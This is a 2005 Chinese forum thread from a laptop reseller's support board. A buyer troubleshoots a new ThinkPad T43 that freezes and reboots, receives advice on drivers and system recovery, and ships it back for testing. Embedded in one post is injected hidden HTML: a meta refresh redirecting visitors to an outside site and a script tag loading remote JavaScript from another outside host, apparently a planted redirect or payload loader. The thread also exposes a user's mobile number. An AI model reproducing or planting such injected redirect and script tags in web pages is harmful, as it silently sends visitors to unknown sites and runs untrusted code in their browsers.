开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

急问:YY,我新买的本本呀,到底是什么问题呀

新买的T43 44U的本本,才用了几天,几乎每天至少两次自动重启,是不是硬件的问题呀,要不要寄到北京来换呀
现在重启后会有个错误
我把图抓下来了
如附件

[ Last edited by tuorenquan0970 on 2005-9-14 at 11:51 ]<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

我们没碰到过这种问题,推进您再检测一下,比如重装下系统,先别装其他软件。因为我们碰到过很多客户拿回去说不稳定等问题,但是我们实际检查这些机器没有一个是真正有硬件问题的。都是软件问题引起的,他们在北京,我们比较好帮助他们,您在外地,相对靠您更多一些。

当然您也可以把机器发回来,不过如果我们测试没有保修范围内的问题的话是要收来回的邮寄费用的。来回的时间还有费用,如果不是硬件问题的话得不偿失,因为还是推荐您仔细检查一下,确认是硬件问题或者您实在搞不定的话再发更稳当一点。
你看看是不是中了冲击波
肯定没有中毒,我用最新的卡巴斯基全盘查过毒了!
昨天晚上用游戏测试了一下,发现可能是显卡驱动的问题,我重新下了一个新的T43的显卡驱动,似乎好了一点!
听说是七天之内有问题包换是吗?那这几天我在测试,如果测出来是硬件问题的话能换吗?(如果超过七天)
2天包换
我说的是漏洞不是病毒
要打上冲击波的补丁
我已经把电脑设为自动更新啦,补丁应该早就打啦!
昨天晚上测试,玩游戏的时候,95%会死机,然后下了个新的显卡驱动,从这里的贵宾专区的FTP上下的,安装上以后,确实没有出来过列机现象了,原以为好了,可是今天中午又出现了.晕也晕死,现象就是:屏幕就没有反应了,按什么键都没有反应,死机头几秒硬盘灯会闪几下,然后就自动重启了,就会出现我上面贴图的错误.
你是不是玩魔兽阿。。。
你实在搞不定就发回来吧,我们会给你一个全面的测试的。有问题硬件直接给你换,如果我们测试没问题再发回去则需要您支付来回邮费。

如果要换的话请马上发回来,要不就按保修处理了。
我的机器也出现过这个错,主要是玩游戏过程中,估计与显卡或软件冲突有关。
正在摸索中。
老大,解决问题之后,可否发贴告我一声。
没有玩魔兽,不玩游戏也会死!平常就看看网页,开开QQ,MSN,就会自动重启,在QQ上问了翔意的客服,他说让我重装,我现在重装了系统,现在测试,看行不行,如果不行再联系
大哥大姐们,我用翔意的盘恢复了
为什么还是自动重起呢
找个XP踏踏实实重新安装一次吧,应该不是硬件故障吧
报告一下进度:根据翔意客服QQ的要求,已经用翔意的盘恢复过两次了,第一次装了一些软件,死机自动重启两次。决定再恢复一次,第二次恢复后什么软件都没有装,还是一样的情况,死机自动重启,然后用最后一个方法了,用本本自带的隐藏分区恢复他自带的英文的操作系统。如果这次还是出现死机自动重启,没有解决的话,我就要寄回翔意来换了,我已经能试的方法都试了!
如果这次还是同样的问题出现的话,应该是能换的吧?
对,如果再用一键恢复还这样的话免费给您更换。并且向您说不好意思了,耽误您时间了。。。
关注一下
http://support.microsoft.com/?kbid=318023

Computer stops or continually restarts with ATI RADEON video adapter

SYMPTOMS
&#8226; When you start your Microsoft Windows XP-based computer after you install an ATI RADEON 64 MB DDR video adapter, the computer may continually shut down and then restart.
&#8226; The computer stops responding at the Logon screen. After a short time, you may receive the following error message:
Windows has recovered from a serious error BCCode: 100000EA BCP1:81356020 BCP2:8145FB30 BCP3:814D7378 BCP4:00000001 OSVer: 5_1_2600 SP:0_0 Product: 256_1
You may receive an error report referencing the following files: C:\Windows\minidump\mini~0... .dmp" ...=unknown #'s C:\documents~1\defaut\locals~1\temp\wer3d.tmp.dir00\sysdata.xml  

CAUSE
This issue may occur if the driver for the video adapter is the incorrect version.
RESOLUTION
To resolve this issue, install the latest available Windows XP display driver for your ATI RADEON 64 MB DDR video adapter. For information about how to obtain the correct driver for your ATI display adapter, visit the following ATI Technologies, Inc., Web site:
http://support.ati.com (http://support.ati.com/)
To download and install the driver, start the computer in Safe mode and use the Networking option. To do this, follow these steps: 1. Restart the computer.
2. When you receive the following message, press F8:
Please select the operating system to start
3. On the Windows Advanced Option Menu screen, use the ARROW keys to select Safe mode with Networking, and then press ENTER.
我的机器好像只有玩游戏才可能发生,不频繁。
如果一键恢复后,什么软件都不装问题依旧,那么我觉得硬件错误的可能性就比较大了。
报告:我今天用了一天一键还原,白天都正常,以为好了,结果到刚才还是这个错误,我要晕死了,怎么办?
有错误信息,截图如下:

[ Last edited by tuorenquan0970 on 2005-9-16 at 19:52 ]
有人在吗?怎么没有人理我呀?这两天我都快被这本本折磨死了!我已经重装了N次了,是不是我比较衰呀,怎么别人都没有碰见这么奇怪的问题呀,救命呀!我的新本本!
我要是要寄回来,要用什么快件公司呀?我怕随便找家快件公司不安全哈!最好是翔意有合作关系的,我也比较放心呀!
没事,发回来吧,我们看看如果真是质量问题就给你换一台,要使软件问题我们帮你调一下。用航空货运,在外面在套层箱子
我用宅急送发回来好了,今天发出。大概两天回到,邮费我这里先付了,到时候如果有什么问题直接联系我吧。我的手机是13336086192,我把错误信息都放在本本的桌面上了,你们可以看一下,我把错误信息发送给微软,上面的意思估计显卡的问题,已经下载了最新的显卡驱动也试过了,还是一样的错误。没法子可想了。
到时候处理好了本本发回来之前先告诉我以下吧,我还要买其他r东西的,到时候一起寄吧!
谢谢了,我已经被搞得很郁闷了,买了这本本后一个星期就没好好睡过觉了,希望这次能顺利解决吧!
本本已发出,请注意查收!
放心。
谢谢!
本本已经到翔意了,现在就等消息了,唉!